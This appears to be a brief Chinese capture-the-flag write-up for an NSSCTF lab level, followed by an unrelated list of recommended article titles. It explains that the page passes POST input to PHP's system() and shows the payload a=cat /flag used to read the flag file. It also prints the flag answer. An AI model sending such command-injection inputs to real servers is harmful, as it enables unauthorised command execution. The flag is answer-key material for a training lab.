开启靶场,打开链接:
这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);
system() 函数会通过软连接执行你输入的系统命令
POST传参:a=cat /flag
成功得到flag:
NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}
相关推荐
Libraeking4 分钟前
导航之弦:Compose Navigation 的深度解耦与类型安全一分半心动1 小时前
宝塔面板lnmp架构,tp6框架网站伪静态枷锁—sha2 小时前
【SRC】SQL注入快速判定与应对策略(一)方见华Richard2 小时前
世毫九实验室(Shardy Lab)研究成果清单(2025版)Hao.Zhou2 小时前
phpstudy 进行 composer 全局配置浅念-3 小时前
C++入门(2)WeiXiao_Hyy3 小时前
成为 Top 1% 的工程师zorro_z4 小时前
ThinkPHP8学习篇(十六):错误调试与辅助组件liann1194 小时前
3.1_网络——基础feasibility.5 小时前
AI 编程助手进阶指南:从 Claude Code 到 OpenCode 的工程化经验总结